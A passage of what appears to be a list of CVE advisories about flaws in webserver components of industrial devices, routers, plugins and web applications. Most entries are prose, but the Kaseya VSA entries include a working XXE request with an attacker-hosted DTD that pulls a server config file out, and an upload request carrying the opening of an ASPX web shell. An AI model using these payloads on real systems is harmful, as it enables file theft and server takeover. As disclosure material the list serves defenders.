XR324-12M (24V, ports on rear), SCALANCE XR324-12M TS (24V), SCALANCE XR324-12M TS (24V), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (24V, ports on front), SCALANCE XR324-4M EEC (24V, ports on front), SCALANCE XR324-4M EEC (24V, ports on rear), SCALANCE XR324-4M EEC (24V, ports on rear), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (2x 24V, ports on front), SCALANCE XR324-4M EEC (2x 24V, ports on front), SCALANCE XR324-4M EEC (2x 24V, ports on rear), SCALANCE XR324-4M EEC (2x 24V, ports on rear), SCALANCE XR324-4M PoE (230V, ports on front), SCALANCE XR324-4M PoE (230V, ports on rear), SCALANCE XR324-4M PoE (24V, ports on front), SCALANCE XR324-4M PoE (24V, ports on rear), SCALANCE XR324-4M PoE TS (24V, ports on front), SIPLUS NET SCALANCE X308-2. The webserver of affected devices calculates session ids and nonces in an insecure manner. This could allow an unauthenticated remote attacker to brute-force session ids and hijack existing sessions.
Missing permission checks in Jenkins Checkmarx Plugin 2022.1.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified webserver using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
A cross-site request forgery (CSRF) vulnerability in Jenkins Checkmarx Plugin 2022.1.2 and earlier allows attackers to connect to an attacker-specified webserver using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Missing permission checks in Jenkins Snow Commander Plugin 1.10 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified webserver using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
A cross-site request forgery (CSRF) vulnerability in Jenkins Snow Commander Plugin 1.10 and earlier allows attackers to connect to an attacker-specified webserver using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
An issue was discovered in the Kitodo.Presentation (aka dif) extension before 2.3.2, 3.x before 3.2.3, and 3.3.x before 3.3.4 for TYPO3. A missing access check in an eID script allows an unauthenticated user to submit arbitrary URLs to this component. This results in SSRF, allowing attackers to view the content of any file or webpage the webserver has access to.
Dell iDRAC8 versions prior to 2.83.83.83 contain a denial of service vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to cause resource exhaustion in the webserver, resulting in a denial of service condition.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0.3), SINEMA Server V14 (All versions). A privileged authenticated attacker could execute arbitrary commands in the local database by sending specially crafted requests to the webserver of the affected application.
A potential remote host header injection security vulnerability has been identified in HPE Integrated Lights-Out 4 (iLO 4) firmware version(s): Prior to 2.60. This vulnerability could be remotely exploited to allow an attacker to supply invalid input to the iLO 4 webserver, causing it to respond with a redirect to an attacker-controlled domain. HPE has provided a firmware update to resolve this vulnerability in HPE Integrated Lights-Out 4 (iLO 4).
By using XSL Transforms, a malicious webserver could have served a user an XSL document that would continue to execute JavaScript (within the bounds of the same-origin policy) even after the tab was closed. This vulnerability affects Firefox &lt; 97.
A remote, unauthenticated attacker can send a specific crafted HTTP or HTTPS requests causing a buffer over-read resulting in a crash of the webserver of the CODESYS Control runtime system.
Vulnerability in the Helidon product of Oracle Fusion Middleware (component: Reactive WebServer). Supported versions that are affected are 1.4.10 and 2.0.0-RC1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Helidon. Successful attacks of this vulnerability can result in takeover of Helidon. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
AutomationDirect C-more EA9 HTTP webserver uses an insecure mechanism to transport credentials from client to web server, which may allow an attacker to obtain the login credentials and login as a valid user. This issue affects: AutomationDirect C-more EA9 EA9-T6CL versions prior to 6.73; EA9-T6CL-R versions prior to 6.73; EA9-T7CL versions prior to 6.73; EA9-T7CL-R versions prior to 6.73; EA9-T8CL versions prior to 6.73; EA9-T10CL versions prior to 6.73; EA9-T10WCL versions prior to 6.73; EA9-T12CL versions prior to 6.73; EA9-T15CL versions prior to 6.73; EA9-RHMI versions prior to 6.73; EA9-PGMSW versions prior to 6.73;
The Cognex 3D-A1000 Dimensioning System in firmware version 1.0.3 (3354) and prior is vulnerable to CWE-306: Missing Authentication for Critical Function, which allows unauthorized users to change the operator account password via webserver commands by monitoring web socket communications from an unauthenticated session. This could allow an attacker to escalate privileges to match those of the compromised account.
Lack of validation of URLs causes Mirantis Container Cloud Lens Extension before v3.1.1 to open external programs other than the default browser to perform sign on to a new cluster. An attacker could host a webserver which serves a malicious Mirantis Container Cloud configuration file and induce the victim to add a new cluster via its URL. This issue affects: Mirantis Mirantis Container Cloud Lens Extension v3 versions prior to v3.1.1.
examples/6lbr/apps/6lbr-webserver/httpd.c in CETIC-6LBR (aka 6lbr) 1.5.0 has a strcat stack-based buffer overflow via a request for a long URL over a 6LoWPAN network.
** DISPUTED ** A Cross Site Request Forgery (CSRF) vulnerability exists in Backdrop CMS 1.20, which allows Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file. NOTE: the vendor disputes this because the attack requires a session cookie of a high-privileged authenticated user who is entitled to install arbitrary add-ons.
An issue was discovered in Reprise RLM 14.2. When editing the license file, it is possible for an admin user to enable an option to run arbitrary executables, as demonstrated by an ISV demo "C:\Windows\System32\calc.exe" entry. An attacker can exploit this to run a malicious binary on startup, or when triggering the Reread/Restart Servers function on the webserver. (Exploitation does not require CVE-2018-15573, because the license file is meant to be changed in the application.)
An Access Control vulnerability exists in BigAntSoft BigAnt office messenger 5.6 via im_webserver, which could let a malicious user upload PHP Trojan files.
The code that performs password matching when using 'Basic' HTTP authentication does not use a constant-time memcmp and has no rate-limiting. This means that an unauthenticated network attacker can brute-force the HTTP basic password, byte-by-byte, by recording the webserver's response time until the unauthorized (401) response.
An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiClient for Linux version 7.0.2 and below, 6.4.7 and below and 6.2.9 and below may allow an unauthenticated attacker to access the confighandler webserver via external binaries.
websda.c in GoAhead WebServer 2.1.8 has insufficient nonce entropy because the nonce calculation relies on the hardcoded onceuponatimeinparadise value, which does not follow the secret-data guideline for HTTP Digest Access Authentication in RFC 7616 section 3.3 (or RFC 2617 section 3.2.1). NOTE: 2.1.8 is a version from 2003; however, the affected websda.c code appears in multiple derivative works that may be used in 2021. Recent GoAhead software is unaffected.
A buffer overflow in D-Link DIR-615 C2 3.03WW. The ping_ipaddr parameter in ping_response.cgi POST request allows an attacker to crash the webserver and might even gain remote code execution.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP1). An attacker with access to the webserver of an affected system could download arbitrary files from the underlying filesystem by sending a specially crafted HTTP request.
A vulnerability has been identified in COMOS V10.2 (All versions only if web components are used), COMOS V10.3 (All versions &lt; V10.3.3.3 only if web components are used), COMOS V10.4 (All versions &lt; V10.4.1 only if web components are used). The COMOS Web component of COMOS allows to upload and store arbitrary files at the webserver. This could allow an attacker to store malicious files.
Dell iDRAC 8 prior to version 2.82.82.82 contain a denial of service vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability to deny access to the iDRAC webserver.
Dell Networking X-Series firmware versions prior to 3.0.1.8 contain an authentication bypass vulnerability. A remote unauthenticated attacker may potentially hijack a session and access the webserver by forging the session ID.
iDRAC9 versions prior to 5.00.00.00 contain an improper input validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability by sending a specially crafted malicious request to crash the webserver or cause information disclosure.
A uncontrolled resource consumption in Fortinet FortiWeb version 6.4.0, version 6.3.15 and below, 6.2.5 and below allows attacker to cause a denial of service for webserver daemon via crafted HTTP requests
Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.
In Bender/ebee Charge Controllers in multiple versions a long URL could lead to webserver crash. The URL is used as input of an sprintf to a stack variable.
In Ultimaker S3 3D printer, Ultimaker S5 3D printer, Ultimaker 3 3D printer S-line through 6.3 and Ultimaker 3 through 5.2.16, the local webserver can be used for clickjacking. This includes the settings page.
In Ultimaker S3 3D printer, Ultimaker S5 3D printer, Ultimaker 3 3D printer S-line through 6.3 and Ultimaker 3 through 5.2.16, the local webserver hosts APIs vulnerable to CSRF. They do not verify incoming requests.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP2 Update 1). A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the webserver of the affected application.
Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 &lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"&gt; &lt;soapenv:Header/&gt; &lt;soapenv:Body&gt; &lt;kas:PrimitiveResetPassword&gt; &lt;!--type: string--&gt; &lt;kas:XmlRequest&gt;&lt;![CDATA[&lt;!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"&gt;&lt;data&gt;&amp;send;&lt;/data&gt;]]&gt; &lt;/kas:XmlRequest&gt; &lt;/kas:PrimitiveResetPassword&gt; &lt;/soapenv:Body&gt; &lt;/soapenv:Envelope&gt; ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` &lt;!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"&gt; &lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; error SYSTEM 'file:///nonexistent/%file;'&gt;"&gt; %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 &lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&gt;&lt;soap:Body&gt;&lt;soap:Fault&gt;&lt;faultcode&gt;soap:Server&lt;/faultcode&gt;&lt;faultstring&gt;Server was unable to process request. ---&amp;gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## &lt;snip&gt; ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &lt;%@ Page Language="C#" Debug="true" validateRequest="false" %&gt; &lt;%@ Import namespace="System.Web.UI.WebControls" %&gt; &lt;%@ Import namespace="System.Diagnostics" %&gt; &lt;%@ Import namespace="System.IO" %&gt; &lt;%@ Import namespace="System" %&gt; &lt;%@ Import namespace="System.Data" %&gt; &lt;%@ Import namespace="System.Data.SqlClient" %&gt; &lt;%@ Import namespace="System.Security.AccessControl" %&gt; &lt;%@ Import namespace="System.Security.Principal" %&gt; &lt;%@ Import namespace="System.Collections.Generic" %&gt; &lt;%@ Import namespace="System.Collections" %&gt; &lt;script runat="server"&gt; private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); &lt;snip&gt; ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
The vulnerability was discovered within the &amp;#8220;FaviconService&amp;#8221;. The service takes a base64-encoded URL which is then requested by the webserver. We assume this service is used by the &amp;#8220;meetings&amp;#8221;-function where users can specify an external URL where the online meeting will take place.
A vulnerability has been found in multiple revisions of Emerson Rosemount X-STREAM Gas Analyzer. The affected webserver applications allow access to stored data that can be obtained by using specially crafted URLs.
A vulnerability has been found in multiple revisions of Emerson Rosemount X-STREAM Gas Analyzer. The webserver of the affected products allows unvalidated files to be uploaded, which an attacker could utilize to execute arbitrary code.
Improper Access Control on Configurations Endpoint for the Stable API of Apache Airflow allows users with Viewer or User role to get Airflow Configurations including sensitive information even when `[webserver] expose_config` is set to `False` in `airflow.cfg`. This allowed a privilege escalation attack. This issue affects Apache Airflow 2.0.0.
MERCUSYS Mercury X18G 1.0.5 devices allow Denial of service via a crafted value to the POST listen_http_lan parameter. Upon subsequent device restarts after this vulnerability is exploted the device will not be able to access the webserver unless the listen_http_lan parameter to uhttpd.json is manually fixed.
A vulnerability has been identified in SCALANCE X200-4P IRT (All versions &lt; 5.5.1), SCALANCE X201-3P IRT (All versions &lt; 5.5.1), SCALANCE X201-3P IRT PRO (All versions &lt; 5.5.1), SCALANCE X202-2 IRT (All versions &lt; 5.5.1), SCALANCE X202-2P IRT (incl. SIPLUS NET variant) (All versions &lt; 5.5.1), SCALANCE X202-2P IRT PRO (All versions &lt; 5.5.1), SCALANCE X204 IRT (All versions &lt; 5.5.1), SCALANCE X204 IRT PRO (All versions &lt; 5.5.1), SCALANCE X204-2 (incl. SIPLUS NET variant) (All versions &lt; V5.2.5), SCALANCE X204-2FM (All versions &lt; V5.2.5), SCALANCE X204-2LD (incl. SIPLUS NET variant) (All versions &lt; V5.2.5), SCALANCE X204-2LD TS (All versions &lt; V5.2.5), SCALANCE X204-2TS (All versions &lt; V5.2.5), SCALANCE X206-1 (All versions &lt; V5.2.5), SCALANCE X206-1LD (All versions &lt; V5.2.5), SCALANCE X208 (incl. SIPLUS NET variant) (All versions &lt; V5.2.5), SCALANCE X208PRO (All versions &lt; V5.2.5), SCALANCE X212-2 (incl. SIPLUS NET variant) (All versions &lt; V5.2.5), SCALANCE X212-2LD (All versions &lt; V5.2.5), SCALANCE X216 (All versions &lt; V5.2.5), SCALANCE X224 (All versions &lt; V5.2.5), SCALANCE XF201-3P IRT (All versions &lt; 5.5.1), SCALANCE XF202-2P IRT (All versions &lt; 5.5.1), SCALANCE XF204 (All versions &lt; V5.2.5), SCALANCE XF204 IRT (All versions &lt; 5.5.1), SCALANCE XF204-2 (incl. SIPLUS NET variant) (All versions &lt; V5.2.5), SCALANCE XF204-2BA IRT (All versions &lt; 5.5.1), SCALANCE XF206-1 (All versions &lt; V5.2.5), SCALANCE XF208 (All versions &lt; V5.2.5). Incorrect processing of POST requests in the webserver may result in write out of bounds in heap. An attacker might leverage this to cause denial-of-service on the device and potentially remotely execute code.
Buffer Overflow vulnerability in B&amp;R Automation Runtime webserver allows an unauthenticated network-based attacker to stop the cyclic program on the device and cause a denial of service.
In multiple managed switches by WAGO in different versions the webserver cookies of the web based UI contain user credentials.
A CWE-255: Credentials Management vulnerability exists in Web Server on Modicon M340, Modicon Quantum and ModiconPremium Legacy offers and their Communication Modules (see security notification for version information) which could cause the execution of commands on the webserver without authentication when sending specially crafted HTTP requests.
A CWE-20: Improper Input Validation vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to disable the webserver service on the device when specially crafted network packets are sent.
On versions 3.0.0-3.3.0, the NGINX Controller webserver does not invalidate the server-side session token after users log out.
u'Remote code execution can happen by sending a carefully crafted POST query when Device configuration is accessed from a tethered client through webserver due to lack of array bound check.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8953, MSM8996AU, QCA6574AU, QCS405, QCS610, QRB5165, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SDX55, SM8250
An integer buffer overflow in the Nginx webserver of ExpressVPN Router version 1 allows remote attackers to obtain sensitive information when the server running as reverse proxy via specially crafted request.
An improper webserver configuration on Plum IK-401 devices with firmware before 1.02 allows an attacker (with network access to the device) to obtain the configuration file, including hashed credential data. Successful exploitation could allow access to hashed credential data with a single unauthenticated GET request.
A CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists in Modicon M258 Firmware (All versions prior to V5.0.4.11) and SoMachine/SoMachine Motion software (All versions), that could cause a buffer overflow when the length of a file transferred to the webserver is not verified.
A vulnerability in the TCL Android Smart TV series V8-R851T02-LF1 V295 and below and V8-T658T01-LF1 V373 and below by TCL Technology Group Corporation allows an attacker on the adjacent network to arbitrarily browse and download sensitive files over an insecure web server running on port 7989 that lists all files &amp; directories. An unprivileged remote attacker on the adjacent network, can download most system files, leading to serious critical information disclosure. Also, some TV models and/or FW versions may expose the webserver with the entire filesystem accessible on another port. For example, nmap scan for all ports run directly from the TV model U43P6046 (Android 8.0) showed port 7983 not mentioned in the original CVE description, but containing the same directory listing of the entire filesystem. This webserver is bound (at least) to localhost interface and accessible freely to all unprivileged installed apps on the Android such as a regular web browser. Any app can therefore read any files of any other apps including Android system settings including sensitive data such as saved passwords, private keys etc.
Trend Micro Antivirus for Mac 2020 (Consumer) contains a vulnerability in the product that occurs when a webserver is started that implements an API with several properties that can be read and written to allowing the attacker to gather and modify sensitive product and user data. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
async-h1 is an asynchronous HTTP/1.1 parser for Rust (crates.io). There is a request smuggling vulnerability in async-h1 before version 2.3.0. This vulnerability affects any webserver that uses async-h1 behind a reverse proxy, including all such Tide applications. If the server does not read the body of a request which is longer than some buffer length, async-h1 will attempt to read a subsequent request from the body content starting at that offset into the body. One way to exploit this vulnerability would be for an adversary to craft a request such that the body contains a request that would not be noticed by a reverse proxy, allowing it to forge forwarded/x-forwarded headers. If an application trusted the authenticity of these headers, it could be misled by the smuggled request. Another potential concern with this vulnerability is that if a reverse proxy is sending multiple http clients' requests along the same keep-alive connection, it would be possible for the smuggled request to specify a long content and capture another user's request in its body. This content could be captured in a post request to an endpoint that allows the content to be subsequently retrieved by the adversary. This has been addressed in async-h1 2.3.0 and previous versions have been yanked.
Red Discord Bot Dashboard is an easy-to-use interactive web dashboard to control your Redbot. In Red Discord Bot before version 0.1.7a an RCE exploit has been discovered. This exploit allows Discord users with specially crafted Server names and Usernames/Nicknames to inject code into the webserver front-end code. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information. This high severity exploit has been fixed on version 0.1.7a. There are no workarounds, bot owners must upgrade their relevant packages (Dashboard module and Dashboard webserver) in order to patch this issue.
MonoCMS Blog 1.0 is affected by: Arbitrary File Deletion. Any authenticated user can delete files on and off the webserver (php files can be unlinked and not deleted).
Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files.
A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0). The webserver could allow unauthorized actions via special urls for unpriviledged users. The settings of the UMC authorization server could be changed to add a rogue server by an attacker authenticating with unprivilege user rights.
A vulnerability has been identified in SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions &lt; V5.2.5), SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions &lt; V5.5.0). The web server of the affected devices contains a vulnerability that may lead to a buffer overflow condition. An attacker could cause this condition on the webserver by sending a specially crafted request. The webserver could stop and not recover anymore.
Projectworlds House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability, allowing remote attackers to execute arbitrary code on the hosting webserver via a malicious index.php POST request.
interface/new/new_comprehensive_save.php in LibreHealth EHR 2.0.0 suffers from an authenticated file upload vulnerability, allowing remote attackers to achieve remote code execution (RCE) on the hosting webserver by uploading a maliciously crafted image.
A File Upload vulnerability in SourceCodester Online Course Registration v1.0 allows remote attackers to achieve Remote Code Execution (RCE) on the hosting webserver by uploading a crafted PHP web-shell that bypasses the image upload filters. An attack uses /Online%20Course%20Registration/my-profile.php with the POST parameter photo.
Buffer Overflow vulnerability in D-Link DIR-605L, hardware version AX, firmware version 1.17beta and below, allows authorized attackers execute arbitrary code via sending crafted data to the webserver service program.
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.
An issue was discovered in apply.cgi on D-Link DAP-1520 devices before 1.10b04Beta02. Whenever a user performs a login action from the web interface, the request values are being forwarded to the ssi binary. On the login page, the web interface restricts the password input field to a fixed length of 15 characters. The problem is that validation is being done on the client side, hence it can be bypassed. When an attacker manages to intercept the login request (POST based) and tampers with the vulnerable parameter (log_pass), to a larger length, the request will be forwarded to the webserver. This results in a stack-based buffer overflow. A few other POST variables, (transferred as part of the login request) are also vulnerable: html_response_page and log_user.
A vulnerability has been identified in SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions &lt; V5.2.5), SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions &lt; V5.5.0), SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants) (All versions &lt; V4.1.0). The webserver of the affected devices contains a vulnerability that may lead to a heap overflow condition. An attacker could cause this condition on the webserver by sending specially crafted requests. This could stop the webserver temporarily.
webs in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to cause a denial of service (Segmentation fault) to the webserver via an unauthenticated crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.
An issue was discovered in Svakom Siime Eye 14.1.00000001.3.330.0.0.3.14. A command injection vulnerability resides in the HOST/IP section of the NFS settings menu in the webserver running on the device. By injecting Bash commands via shell metacharacters here, the device executes arbitrary code with root privileges (all of the device's services are running as root).
An issue was discovered in Svakom Siime Eye 14.1.00000001.3.330.0.0.3.14. By sending a set_params.cgi?telnetd=1&amp;save=1&amp;reboot=1 request to the webserver, it is possible to enable the telnet interface on the device. The telnet interface can then be used to obtain access to the device with root privileges via a reecam4debug default password. This default telnet password is the same across all Siime Eye devices. In order for the attack to be exploited, an attacker must be physically close in order to connect to the device's Wi-Fi access point.
IntelMQ Manager from version 1.1.0 and before version 2.1.1 has a vulnerability where the backend incorrectly handled messages given by user-input in the "send" functionality of the Inspect-tool of the Monitor component. An attacker with access to the IntelMQ Manager could possibly use this issue to execute arbitrary code with the privileges of the webserver. Version 2.1.1 fixes the vulnerability.
An issue was discovered in Open Source Social Network (OSSN) through 5.3. A user-controlled file path with a weak cryptographic rand() can be used to read any file with the permissions of the webserver. This can lead to further compromise. The attacker must conduct a brute-force attack against the SiteKey to insert into a crafted URL for components/OssnComments/ossn_com.php and/or libraries/ossn.lib.upgrade.php.
Path Traversal in admin/assetmanager/assetmanager.php (vulnerable function saved in admin/assetmanager/functions.php) in Chadha PHPKB Standard Multi-Language 9 allows attackers to list the files that are stored on the webserver using a dot-dot-slash sequence (../) via the POST parameter inpCurrFolder.
Path Traversal in admin/imagepaster/operations.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete any folder on the webserver using a dot-dot-slash sequence (../) via the GET parameter crdir, when the GET parameter action is set to df, causing a Denial of Service.
Path Traversal in admin/imagepaster/image-renaming.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to rename any file on the webserver using a dot-dot-slash sequence (../) via the POST parameter imgName (for the new name) and imgUrl (for the current file to be renamed).
A webserver component in Paessler PRTG Network Monitor 19.2.50 to PRTG 20.1.56 allows unauthenticated remote command execution via a crafted POST request or the what parameter of the screenshot function in the Contact Support form.
The popup-builder plugin before 3.64.1 for WordPress allows information disclosure and settings modification, leading to in-scope privilege escalation via admin-post actions to com/classes/Actions.php. By sending a POST request to wp-admin/admin-post.php, an authenticated attacker with minimal (subscriber-level) permissions can modify the plugin's settings to allow arbitrary roles (including subscribers) access to plugin functionality by setting the action parameter to sgpbSaveSettings, export a list of current newsletter subscribers by setting the action parameter to csv_file, or obtain system configuration information including webserver configuration and a list of installed plugins by setting the action parameter to sgpb_system_info.
